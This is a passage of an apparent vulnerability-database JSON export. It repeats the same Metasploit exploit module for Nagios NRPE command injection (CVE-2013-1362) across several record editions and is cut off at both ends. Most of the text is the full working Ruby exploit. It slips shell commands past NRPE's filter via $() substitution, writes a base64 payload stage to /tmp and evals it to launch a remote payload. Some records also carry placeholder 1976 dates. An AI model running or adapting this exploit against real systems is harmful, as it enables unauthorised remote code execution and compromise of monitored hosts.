nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-06-01T21:53:50", "differentElements": ["modified", "published"], "edition": 75}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-07-20T20:47:30", "history": [], "viewCount": 102, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-07-20T20:47:30", "differentElements": ["modified", "published"], "edition": 76}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-07-20T22:51:23", "history": [], "viewCount": 103, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-07-20T22:51:23", "differentElements": ["modified", "published"], "edition": 77}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-01T13:05:21", "history": [], "viewCount": 103, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-01T13:05:21", "differentElements": ["modified", "published"], "edition": 78}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-01T15:01:23", "history": [], "viewCount": 104, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-01T15:01:23", "differentElements": ["modified", "published"], "edition": 79}, {"bulletin": {"id": 